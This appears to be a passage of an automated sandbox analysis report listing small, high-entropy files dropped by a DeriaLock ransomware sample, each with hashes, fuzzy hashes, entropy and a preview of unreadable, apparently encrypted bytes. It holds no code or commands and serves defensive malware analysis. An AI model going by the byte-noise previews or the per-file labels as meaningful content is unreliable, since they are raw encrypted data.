                                                                                                                                                            SHA-256:9928D5724AFE4AB919DD8F4D2C8EF2CC675A3C7B4CB2B7F0F26C1490ACF853D5
                                                                                                                                                            SHA-512:FF73584B68DCCB98C13E712AE2963AF6B322BBD4AC38875F046673EBFAE084910886344B800A8181E62FAFB1E8AE4338D6B6EA664561DD61EE492C1D4A4B674F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.lOJ.m.~D[.Mq. ........^...^..D...A.P.....1U|0.g..:s5`.7.B.~....?b.M...Z'O.b}..*$.......j.M..../....M[.;..._...D...R.y.=......I^.F.:....(.n unX.P.1.o......O..C...>r;.7@...Sy(.-....|!-.....y......../..F...z..e.+cU..]F.........q;Lk.~./...;}KF_..2...?..d..@.A.0.'.._.N...-..%.Pm.wzW...%..`..}..5.@....V.D.Q.v.<n6L.&.{q..*.Z...^;.c}~...c..o&'w.....m.........+...n......s...wa.(qI%n...3;.i.....J@r......;..9....7c(..!bY...u>F.R.....v^...1..%.7....n+.lX.s..}...i.......#D.. .n...M^......Q-....&.....6E...}^JC...".m0G..7jt.!.`..x.a..R~^x...m.~...s.u....z.......$&i...E.../.~....4.#...0..)?......qr..L.+v9A..s.e.....z^..&..k....b...Oq..R...l......0Yj.N..^6.\D.h.-I.bv.....n.\.Q.b}..H".8[.j.+.; M}......J..Sf<...`.W.A....S_`.#Zj.d.....h..&"uL.;VkIo..B.$.y..O.%...U..).L.-..9..-U.N6.&..s{=.h.s...h[;/.j:w.L.N.q..}...)..?K..xQ..r^...3..G....^.;..9P..M...&..6...>q..#..o.z.k..^j.V..>..,?.Q;5M4.I.9..,.O.Nl..U....+FZ..a..u..aH.,.7.-'.c.)..*..w!g..$.e.f..`a...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.814814613304565
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:jcLp+7yuMdwpCqdX6c3e2jq/bgPYgR691ExmUlCcmbGR:j7CuX5q/0PH/mU8bGR
                                                                                                                                                            MD5:21441C59A428FEAEECE12209299ABE32
                                                                                                                                                            SHA1:3C87FC5216ACC5E16F7F526999A51F28B2ADA4D3
                                                                                                                                                            SHA-256:6DD36FEE54BFD02AA2739041420D4A801069572E8ECC4995F64863637CA4CA52
                                                                                                                                                            SHA-512:058461291DF6515A0726F21565A1142516281B598C6549A750683AD62AF9714C2B8E41C439A4A1C7C18CC2F60501CE62F82823129E5A43EF5BB8C8E52884C742
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.....{........?.^..V.i....{7.A...!.i....BtDL..'>..%..k..R.Q.L..n...D....k.6.:....|..3...Q......`.....G.".%..2...kn.d'.J&..`...).vc&m.#(E|6_....Au.F..h..k-..x.z.Z....f.....?.W.2(..a.H..K.0..st^..`..5"..5nt.!....q...M.'.J.L.5...g$@.pas...lc.....b0....D!..ek.......M...v.b.*J....XY_..w.I.. ....X..v..G-.'K.bu.D.!/.8....".p.....n...}".}"...K.Di.DO..^cZ.... 4*...r..i...C....-..........Q...6UD..D.s...n..c.H..}R..z.8...s...?..6......~{_Ks....X7.l..G. .....=..W@...1.E.W....%:.+-{..u.-.`(UU..t.n.e......-...16...rR.{..fn+.....6.u"m....U<....]...xG..........f..i!hI.xw.l..)(r.......W.Ga..u.....}X"....b?.....T.....{.5.nB...r...]s..+..Q..<.)...b...{(.ZjL...].y5....W![`LC'+.t....u.t."U..R.s..v.............~te.A4.".....Y.(.....#...W..?X.~..9.E....)C.._%.0,.[.......tq....JW...r(c.*c..5.ph.Z..mp.F6...r.j.6.62{.2........{d./..K.=c??.MdZ.....=M.=.$..Z/m...K2.bb..9z?...s.m..u..gvo\>zmy.G..L..a.....b>..|3..g...54...j.........(....f,...b,-.p.cMnq..\..8J.j...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.811655545942996
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pxhXpOLIp0uZEIgGe+Sc4IzPU836yXhYfzrKu0hGeX6meyluhqw+37:JX8LaBZESFNzPHqfATFkhlk7
                                                                                                                                                            MD5:66FEFF3AC861F2842D7D328B34526370
                                                                                                                                                            SHA1:25D0DCAF698DA49BBC6DDA0938CDCC55185D9398
                                                                                                                                                            SHA-256:4D16E4FDA23D77FEA40EE050CB6501CA1D2AF070A3318E47C6526509CB251CEE
                                                                                                                                                            SHA-512:05A24F414D0CFEF1315A96E84DA3DE4471704619D467CD2F2F45808D251DF65ED1E16D509FA02A229EC9463A68FB05B5C8C3D2DD6DC471CA44E73ED8FA5BCAE0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:#,.......)A......U(...vi.......F..".t.3)..f.+.....d..8..6..'.O.7..Nm...bWU.po...`..0..D..Yya....w./..T.W. C...8{e....{:U@.D..M.n..x.I?_../l!8v.A.S1....eBHb1.U.s....9.=|...~b..X.....4'...W.&'........(......?..:.x.ITm...a1........K4.!.].k.|.S.l8.M.>..tR.l..G....."Ff......%.A...S....mL..`..r_...`.;L../X........'.(+U.{.$....y.............bHg.&.G.....y.{.zg.9.b......d.......].1...A*`..P.k330..M.6HRo..c%=....d|.....<cY..r..3..k..f].....6..".}..............g..@U.c..B....4.)Nj..,..>.%.=.V.V2....A#5....*...lk9-.=X_...O....#.C.....lqD...O.j.<.Q...>B....!8.' 1...6.L7..j%~c[.........6..?.([..^.VD.."|...}cL..7S...VV.y{...W1z..T...F_.........Fw.RXL0.w..X.|..*.8.~.e^`O)..+.|K.(|Q.+rx$.f...jf.*.FJ%..l`..8Lp.x.L3.(..6.ud.ib`k...+.......S.......%..j....,A...9.U.T.....-i.`.....bI......>.W)....`.%.9..>..#.S.z.6.G......)....."..O.]O.#.%./U...`Ei...N..F.i..z.I'...."....U.j.>...9d.P7pO.0...b...2t.ca.YRU..?..t@U.\....w_..*,nl...A.....o.d)...S.-..nO.97.,(...a..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.841269065882734
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:CG/kznInOKcZOf9+37xoYW+1D5A2X1e8yI1lUCL:jsznInGOfO7xlntA2X1tlbL
                                                                                                                                                            MD5:1611FA7F218F1332F78AA30F6E281887
                                                                                                                                                            SHA1:A1C7A51F174EF6194780B00055710EBC60A4918A
                                                                                                                                                            SHA-256:C08AD74B166F9E262DA065136E82E8CC8D2054174F1DA984372235ED2BDADEAA
                                                                                                                                                            SHA-512:73CE1F32EB8AFD08E1B994EC61E76B050B9588A309BE26782380E069274D45237539D094E004B0E5CD68E05F962C4818AD344E8FB541C85455A20CA0BB96D2AD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:I.Ui]{X.Fx..`.T..-.U.@...\.n..7...1..&N.U^$.:&.<..<...1......m-..R..'L.....!.M..G.5}\.B.w..{.Y.......OL..{0.....-..|W.W.$..G.i..LX...(..kS....f....T....[>.\.zQ.._LMvv....1X`..g......M.M.../T.NU....)..IokK.. ..Y-.....Bh. H.0)....(..H..v...|.....yDJ.~y...fo|....=F.......o...d.n......p,}[...d.t...O....}....eD..K..R7.Q....L.M..5......j.....h....!<.s..kz.Z..J.q$.S7._KV..zj..w.X...z..o *......4.-b...o8..m-...u{.,U...0......C9K.~.q.A.. ..k...0..t..E.k..^.T...m....).Z...`...8XC..e..|\..0>ro@..u......9...ea`..i..n.s&U7.m.e....v..W&..../Z:Nm..%....jf#....S...Ig..^j.*.z...H....d.@j..\..O3............(a.s.Q......}.y.g.)..i.. ..:.u.F..\k......,L0..9iU..a.j.!....w.}f....Zw1.'g..VF..y...e ..S.~.x....x.l5.....Yd..t.f.t..|...Y....$l..T~..Y.&.I.".V2!>.#..h.1..[........i.I._.....J.K...Q....sgA.P.P..y.s...8......V..a...=...fg.].._..mFw\...~.u..Qp.i...B...F..;..^...@.3x.....k.a/.....I ..'...!.p....I.s...F.....N.&.#...s.,n...qE....+lu..e._..^..mf....f...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.823351687652309
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:XqmbZzcdNhjECZ3yfEEnFaMqAy4tSFCEXAGBOpIYT0pdx:XFbZzctjECh82AyeSoEXAlyoE/
                                                                                                                                                            MD5:4DE21D06B0153227184D8B3119354FB1
                                                                                                                                                            SHA1:5C56D327DA5406CC8A731D23015E7F3948535E01
                                                                                                                                                            SHA-256:939066E5FC17426EE0BDBF0DB824DC18FCA3A909E62EA1902CAC22169AE61D1D
                                                                                                                                                            SHA-512:A9D76918E8146C9673C396C81C7825B0292743F3ECF2AF51AD5564C0561C7169F740B56BA84BEBA74558CBA13B83D10D2591E7DBAF67E051673F27BAA090DA0B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..7.C.R.y.f... .s.H..TR.\7.....^.8j.O.r.#q..5.Sv....G.0.6.l.7.....v9.%..(E....<~>...&O.&..).....8.<)._..N....~-......2..v.,8.S....f.<......+.k6X.r......Q>P5.. _.......(..#,..\5.J.+.M..>.....c .)....h..:]...s-x78......Z.d..:.p.gS0{.M..!...2.j$u..c.'...^.....(....a?.sr...*>*S..O).,......<.|k..;.+.3.o.Ee.M.'...Q.].I&........[.7.>..W.&Imm...d...F.a..f...C..p..\....|..5....H..N.....".....o...E.;i.....R~s......w.U...M......2...D].....a.%..'..{\.....2.].....-n...[.......ml...$....jQN.......A..g.........|T.Q.-U..R.{.'.{,........*.Z^.3zX._....#7mL.....O.KRE..7..|X....o..9.K.@Yz.......x..".1.="..=.........GbNm...N............6.B.W.%...k...2!.huu.....uq..^..5..}.C-C.{..x..51..AgR..3k'C........t..u.....fo/3..V....E..Dn.>T...r3.h..........-..,.b..w ..&2....ywG.....1].B%,..W~N.h.6_.....1t.....n...O..}.NS......?.R&n......=)W.il+.M......S.K.e......u..K...pUV..a..15.0....*{..w......!N..TE..be`..+..xuJ......N..{.*Haz.!.....4........9....y.?."......U.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.793433178647225
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:jSQVo8LQu9jLk+J3eqF6him/rYc2CBm9qmeJq+bkFn:jSn8L5tp6himMiM9qmeJq+bkFn
                                                                                                                                                            MD5:36E7DE9DAB4DB6E62E9760E1D55140CA
                                                                                                                                                            SHA1:2DD05909ECA7BF0AF62107754552203E03F0F0C3
                                                                                                                                                            SHA-256:75EE470953C8C1F57A61BD9C68504157D34C5E9305AC510962472722E370C58B
                                                                                                                                                            SHA-512:2203EAD5E9850F6E98547273580183D9BDE8DD98C33C5E7E565289F17EE987B2A08C534D37C9000A733E577642934D902260DB28D64DEDD240AB933FAACD8D59
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.4.>......#-.#e._.w.O....sV....tw.O.pG...d.D......x&H.t...O.........'......nU9...D!T..$......#WM..'%......F]!D..........Q......d..1a........oS,...@..zHh.7.?4..y5...b...../..1.[A..._n..o.g0...0.b......g.....7/.".\XMW..@...&.CA..QX...1..?...D.,..0...h.\=qHu....?>.z.su.W#.....g.<...t7.q F.[...g.I{DQ..../.n...L..). .+...:zD..i9.*U.9.m.....R....Qc0.o..qv..7..9._.K.}/./r.w.<x..V.S...(..\.0..+...l..dm\.......V...'.ag8...........AY.........p.......v..wsr.t.&...4.g...Y.CYM..j..+.a.,&.\..6..".C...M..rX,.?.jSjd.<...k...m?..iW.....9..^..z`..P..MF..O...+.......jw...f.....=......k.SOE.O#;..,?z...;..z..@A.S..9n..r%...m.?..x...!....}.....Y*]6O...........M.:.9$a3.S.......V.g.'.f...F.".......y$h.]..........lt..1.."T.D.y.z.../SQE..Z..r..%0|...w....q.wQ37.L.ws6........RrN....%,`8....'3j..S.yH..D..........s.....N.#...........8.........!.I.Z^...T...*D...#..p...qM.:<s..Z,......%N...Y^6....S...t..V..aNu..$.........?*-.xY.YC...H...s.y...._2>...*.)F.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.7915743785448015
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1gw5QJlogOqRdAF3WVE5O/gX5D2dPxmyhFq+b1N:B5KogOqdAF3l5OoX9S5m8FHD
                                                                                                                                                            MD5:C6E06B345F31A5465267C9263D834420
                                                                                                                                                            SHA1:3DFC9B13A112B0554A4A90F0ED28BC751112770F
                                                                                                                                                            SHA-256:28D77B016DBB2C641408A9DB4E691A72590E0D3474A72240FE8B5CEB05D26AD5
                                                                                                                                                            SHA-512:4CA7A054B884208DAF7E20D24C2E02669B2216FC55FBF437B2AE015ECE8D571E2E5C8651508597D533E5EF4EF8B6EB604A2D4E91872D79E932C6C569130DF7DD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:C=...._.........{.c..ge$.........E..i{\=/..(,.q.DU...........2..q..N.#.,.....c...\..t....@...@.pU..@,"..|....~....%.o..04..O/.t...m.~."...?.`........G..ET..J,g.>2...........y........w.....<.8W.\..|&4...v..].h&T....\wY.....(.4r.h..I..|.a..9V.)n.lCc..<.o@..S.@...71.0..s...Q..\....E.f...h*Z...P.i.e....@h..gQs!:.?..k..VW.`.)..&m..:.b..L.gu>.?7o.jvk7.sC.<..Qw....;.t<...wP/.j.'..0.."..2..C.*(..VP..&......gxf.e.X.:..l.-...D..(.....Y.VB~...nya8.j S7...Ek/_....l..n.:...7..F.$..../...._QY.\.. J.I....U.}....=}k...GrsE.....-{.?....%.......!../8m3..G_-..m.D3.EF...O.pQS.T.=mp.7...-[O.S.~.).........1..a..3..Z...@./..M...d...=...Xz...Mw.B.}.S`........c!...i..:wZY...6`....i{.e.Y+.8.m?.....DO5E...-V..h.u9&Oyk.........Ys.8.~.....q..:J..0F3"....9..s...q.*M-......D.....F:!o.....H.a.........}.*.....1.r`....v..b3..N.k.=....~q.a....fF)-l=.v. .c3K]2..>.p.X..=.->.....:%....JmY...X...Y...-....I..=Zs...*......R.(...."...U.c..&gR.v.!j...{:yP.....e.~+sg..B.TV
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.819224527686344
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:83KZYJGEQqn8EYdFlKD2jS/MnIGfcLx1JTdmVNDn:/YJG5q8JKD2jfzULxxmHn
                                                                                                                                                            MD5:97F18D783168A552175F5A9A19FC522B
                                                                                                                                                            SHA1:E0B50EB6B4676467A110C6ED42BFD81EE2A91D95
                                                                                                                                                            SHA-256:66352BA79C5F22BB1FA1B7E2DB241C77C5162DA76261BCC3B22CE541BB95BC14
                                                                                                                                                            SHA-512:D8CF3247EBD0813073D70E14F42C0CEF0FE34713FF89BE6B14C8CD751DC1CED8F73F8F3576B03B8A63A6FF73D91864ABBD71DB2EAF872AED08D795B458CD1820
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:%6+1..*..}'Z.=.tO..&..k....-..3=K.}G.FYKE.~..&..8x2......H.MJ7"[.b......r...M...in$k......c..w..l)....4I..C.3P.......*....c~..in.....d_oNoM.......@.....R)....TF.b/.?.S*.......ELB..0Q.1/.oh.je...{V..P........H.z..S.c..{....u.r..rK4..sX.....V....7.....y:..a..w-..iu.>.. .....H.VD......vQ.a...q~.>..V...r............iU.D...*.....B.eD......|q..3..}...^e..9.D\.&...A.(H.z>.d.....*.}|A...QAF...[.(..WS0..?..I.Q..4....S...5.N...O..r.#.x,y};........06...@.._.FbRT..{.A.....9F!L....J........,....I.........[s7.;5....'G6l.y.0.+.U....6W.da......T......@:.....%_.?......Z...x...an.!.@.w..@... B.;}...s^45|A.M.f... ..)....*.-.R.g.D.-`g...R.-.......k{.!@...t..}...!...Y...*Q..Pr.w...C...,.I.Y..8YS...O..Tk..YXSYH.....V4...M.m\.*.....$.2...z.8.H0..V..Z.p.....~.......0#E(L..[...c&.o0s.|U.?.. ..K..+G......s.1/...j&...o0...B...w*..'......pX....5_......hvi...5.(O....j...9%.q#.m.;..*...s2..t.c.%.<4h._.G..7....6x6.:Kl~.i4.5|.....m$.W.b.._...F.....4...l...yP.R..I..X.._v.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.816532565644073
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:AHeJK9se2GNcr0WJzjmwABhl5/zsJERXuXbYSnJcJdy:A+JKy7GcrPf9ABhfzsyRX2UkJady
                                                                                                                                                            MD5:C5C6B8A7456F137C3BED81146C0EE1BD
                                                                                                                                                            SHA1:63FE1453BA413977D70799C3E674A69750B051BB
                                                                                                                                                            SHA-256:B9C2F5F70407D90B0CC9E213D052992AAF7CE8BC2737C9027E3E08A6358BD984
                                                                                                                                                            SHA-512:DA8618FBBE4A6FEA29FB5488E4D18B25EB550D61B93F57115834CB995F834BE6816E10F9AD23710D8EF98F54F8AEBB3F59455DD0CDE8379C00E1AEDBA3BECD52
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.B`..z.TvTn.........U.!...l...L.NO..l/.....>..&.C.Y9&;..0...^y..p.1...*...|..,{\.c..J......B=..[5..NK~.E.......d......|b.>%.$A.7.K.S...~....9/n.Q....m;....T...".%f..~...w.V.{....=>;....c.{.....k...n...{...@:Qu(...%X.}.....R..|..T.u.uP.........K..O........#..)...^.{.#..^.e..~....G"k. .?M.>...v....Rc[a;'...@...us!4JX.~.Q3j..-...1.=..J...g.1A....". ..R..s.GM.r.B-!F......p..I.l.,....\.}.7..r.._...D.0..B.s..J).A.@.^..,.l..Z.h".5...(.....aI.$......P..OB..7.....W.....&uH.....e.o....(B..7V...D._vD.x.D...._.....6=...-./.CD....%bj{.:..9r.Rm.......J'b.}/C.......N.d....s...}vK.w.z.!.4X.h.t).7:..U.q......d.....W...5.E...L..f.2$}n.......=..{......LZ....{...}....^S.#..5f..."...H..I..VtN..,..@w...h........f....P..t...dd..._P.^..9.Td.Ya....).%...E.nM3u}...vp...B.H..;.D;..3.'.]7.@nV...u7E.+h....7..>,..oi[S.).....2..K.f.._u.O_,..u\......T..J....R.....,;....n.Ix..oT.-0...,.}UZN.....30.j.U......[....t.].......@....'.+\.....Q..F\(4..1.. r..Gh..../2......*
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.801277989919656
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Gac4Qj+f28jwyy1RKuOXO9l8tqLAEfVkL0lwWVkXDhSRCJzqVWW:3rU+vVC8taAD1ngRCZuWW
                                                                                                                                                            MD5:61CC649CB67C64506C78EEFB2FC69C00
                                                                                                                                                            SHA1:528D3CD20F2179B2DAE8727D3B936DDC704E53A7
                                                                                                                                                            SHA-256:7F2DF9CF481A79189FBA0252789B593D8F1DE8DCFE4ABACC869E1106BFB10E8D
                                                                                                                                                            SHA-512:9A50B7BDE24C9EC81ACA4A3279D754915BE751A72C9AA6BA8083E8DC4A1139CD2E673635FA229FD54509E391BD514B423529F3701B6D5A000CEBE9B7E7A1EC36
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...C6'....l d....}./..t..>...+dL.....#"..y*.../s....-.b!5...K....*F.-..F...3Y....S `.{QwM.;.W..h....t2...9(.%.......-........_..F...*.=0mB,.Qh....U.*..B/.3...,.t...&...`'.yP..ue...>....{w`.!....%..V...E.TAF..)Q.4.#p.@.s...N.wu..T..8..i...-.."=td....*S.d.=.h.}G........R)..>1.-].Z.b..c..42Z>.3.:`_U?..$...\.C ..jE..L....b8..:Y..h.Z.?9.#C...l..S.d...h.\./..p.....3....o..d.:.Zg...A.c..IO..n.rC.....;.(.!..g... P#n....qP....fc.dR.G.....N....P8O.S.......R.F...<U.F.L.6.e..o. l0m......+...a......t.SJ..G.>g....|D<..Pk...+L.... .~2K.TH....O.G.......\.-......+..F.OM...!...o.l.L(....[.....:...>..7'.Lo)N.....6.=cVw...#...e."..Y...h=..p...%.7J....T9.+..@.d.g.H:~(I..}..J.Ep.D..]....X...eJi....4.n3..C......c.R9...\.....'5.....).B.W4o..y..m.pl......m..&...O.....zLB..U....p..K....yLHX.!....O.$......t..7..1..8.0=1.t./p[.-..[.G...j*R.]....q.>....K.dD9.7....D.T.%.s.M..'.'......wF.....ZI=......S@......[Z...@.*..OeK..b,VZu,k.....m.)^%...1.O..#{{W.P...<8....[...... .
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.805741172041096
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TV7uOrZMlD5XDwK2bFuCbNAorQuyv9meneXjnSEI:haWMl90KW8Cb6YQpmYez3I
                                                                                                                                                            MD5:10AFC49E50FE15C255D0D302A83861D2
                                                                                                                                                            SHA1:57E4B43ED6189E14E43AC8382F3BC06CA66208E2
                                                                                                                                                            SHA-256:44FC175EECA6CF32F28A11CD26D6BDA18265276236367A5FD67455B52D9A75BC
                                                                                                                                                            SHA-512:0D565194630DAC9486F0AE2954FBABB9AD3B77AC6B0EFF09A07725985BB1BDDDCABA5D65C083DC685491DD8C9EEADBDA96B43A1E5EC673E913DB33E1DB1B99BC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...#s.,!.a..8.........._.......y..H.Y...lR...x..sn...M.P..Z)l.ys...az)r...{.Y...l../U8)w.....,L.z|..m.7..H..+~..9..f.'..N.D...MB.y.1Y..u.bx..z....v..ln .$..{s...X'..)..}.......E..}K.....B:.1..ew.$H3`b.H....u...vX.Q~....4z..K9M..vI.P...T...g......y...m.:e..k...(..L...6.....t3....b..............UY...='#O....n....+U.`..[..F.............e.k....0..W.0.....8..'.....g.5...8cA......Z.......H...\..K..y.=;M...\...7..f....+[YB.....~K..nDG.....o.......<q...|N.*=....y.....A.%..\..7d]..[.;.l..F.Z.-.a.Y...Q#:>@.._...(...b..R.#p;cSD...._......"....4...~Y..gN.F.UPD...m.A..K.o......_4.....(^Nj....*. ....mN.u..5.$.Y....Q..}7.e,YR.....ql.....W3`.u..0.o.[..#.......G...!|V.m.5+A_...x..K...L.6X.\.>.04.cu0...Md.........Hq.;..C..t).........Mn..\,P,n.0...........y.K.....3...l..p,o..\..j"x..f.m.V..1..G...f.gn_..7.UPI..~.k..N|`o..T ....Z.OH.].F.^P.V.......FOu!W.G_[...0..P].a..k..:.o.....i..K,...F .@.5..e.nX"...L.. ...{FL0..$Hx......!..._.n..S?J.OJ...@H#....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.813434782227548
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:AMDu8f3vDe09df31N4I3Ge7vj7le4D/5JkL2CEiFOjSuJV5vhNS:njvvDtXvXN3lLSJEiFOjFJV5vhNS
                                                                                                                                                            MD5:81076B86F0EC55C14252FACB32194A46
                                                                                                                                                            SHA1:C1A69752A4E7DCE7BC2B7DC8C7F231A5427D65A7
                                                                                                                                                            SHA-256:80DBC995BB1AD8572084C70CE423F49A845D1664C218B668DD4C68672A27BAA5
                                                                                                                                                            SHA-512:AD8D079DAB1A41AA4E5BFAC8BBC16DD33A64348196DDFA321F9CD567455128F4FD53D7C7A8EBC17A67C94764A9D2DB8D6ED9358EBDD3B078287EE7B9897F2140
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..Z..y\...@.....Z?pL.ZkP..m..2J..Ze..qr.W@N....5..3w..q.....7...`XL..zL.g^d!..F.C'......N..s}....eq%-.G..h.1B.A>. .\.2L.-8F..p.x....L.u...."jP[.4.w.D0..7...]...*S.1z..).S..GJ:I....4}....\..%.....<5...(....j:.[.[..Y..S_0$==..D^...-cRe>n.,3.{S.)!2.H....."EsR....$....M..b..(...VWTB....B_..0..H.+db..Of..&.>....e..y.ru ...v.....z..B...#.d.5.S.].r...:V....C.2...g......?.~.3?-+K..&.m?....#Z.b...Z.>.v...}...@...mt...l.>.....e.(Uq._.m"^.0>.'H.*.....?.#V..._.I9..p^.........c....!.n...?9|u..c4./..1.`I3.....n...2.....rqf.0.. .....5.....u..U.#..e...<..3.W.@a.....`UQA.....It.-........Y*.....-.....b.E.....E....0.y..~...r.%.l.l..C.{.j..).].......x.5..0.....L..al.Ir.c..-9.Q.I.E...`.JeTPs.i.......QmXj].~....4"...E..qHK.O]..7.h..2@..0u..bF..i(B.E/...E.z.s.....D....vu<.yE..L.|...4..~0.Il.P....'S#....=...9...H...z.....M.m.R..Ir..<.l..D....r,............n....W.''..;.|..m.i..{y...-..I..k9.....5....z........H....".a.wb....^T........L.+/.....G..fDM.Y...c3.z...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.819449743911794
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:iMWQacPmr+7Y9l4l5Hq13hqMrAhGd3iatQcjK:1ul4l5K13fQGd3jtHjK
                                                                                                                                                            MD5:9157A37539AFF9483D210A9757FB9BD2
                                                                                                                                                            SHA1:C65FA42AC2122B19430E6CD2D05896CF9C9C6F52
                                                                                                                                                            SHA-256:BE2F646AB7F0B53D44A3ED2F68F28862F7F6893ACEB81BCA0E4B27F211AD1B43
                                                                                                                                                            SHA-512:F67D0C0EC1A626888EA46E3AA175951DD331F53C80CEA572D6ADADC7FE6E9F5AB90CB8616F365783947745FB8314989944A2B44F7F02AB1525EF4E4B6C57AB5A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:(hS...H.6...Wa..W3f...u..%.._-h.hvK......1.:E..z..xf...G.h.t....1..`5..+%.f..K_..Z.x....%..c .%.#V#%.t..Xcp..> <.8[...C@.D.. .j.B...o.7...ev/i(X.{?...D.].g.h.~....O.S.#$C.(.vdg..GS..NuxOe...u.....Rw...vd."...i+...t......Nd...s...r....<....}......P...$.j...P.Nb....d....I.b!yfP.. G)...;$e.8Y)7...@Y.B.L[..^b...b.@.?.Ji..r.H.`.J.1 ..f..t..f."9.$..y.-...&........'.At..F)h;..x..J.m..(....:...f...ZK......i.[.].a9r../..o.}..&G&......]...O..6..WWw...>P"l>..@p..b.S.*..K.8...4K.......b..l....6.i.|.........vo..3m....h.w.......a..c.g.)...s.t....*Pl.i........].sWV`..!......O....jn... txR...RF..j3..4A5n...=)....B..a..{PS....Z.`........I.E0.m.>.yH...m...p@5.%.....*..K..\...w.%.g.>.?.KQ.......F._.0...:......;......J...c^.......|y.A)|...|...x.f....M...G.-......a.@..4|.N...y.(...7..K..A...~...qo..N........g"...1/...&D.S.do. ....S..o..jF^..M..`.9.....j"..Ea.!..).....r....U.....D......f..0~...b..P..I..z..{Z..Pq.t.....[..z.z.r.}........:...?.R..%..?.:j.....R.2
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8035561621685385
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:lBlHaVJ7QG+G0U3351WERoF/WfsPGZ/GEAbQEBcOp6c:gH5Q2oF/WfYGleR5P
                                                                                                                                                            MD5:5910D60ED896C2C8A722292D2F8EE0E4
                                                                                                                                                            SHA1:15458DF7D4E8E83294C94145CFC5C631F6C52041
                                                                                                                                                            SHA-256:4F40C1814F3C90FAE742B072A096D8609914B06EDE1F077D7255DDC53B13E0B2
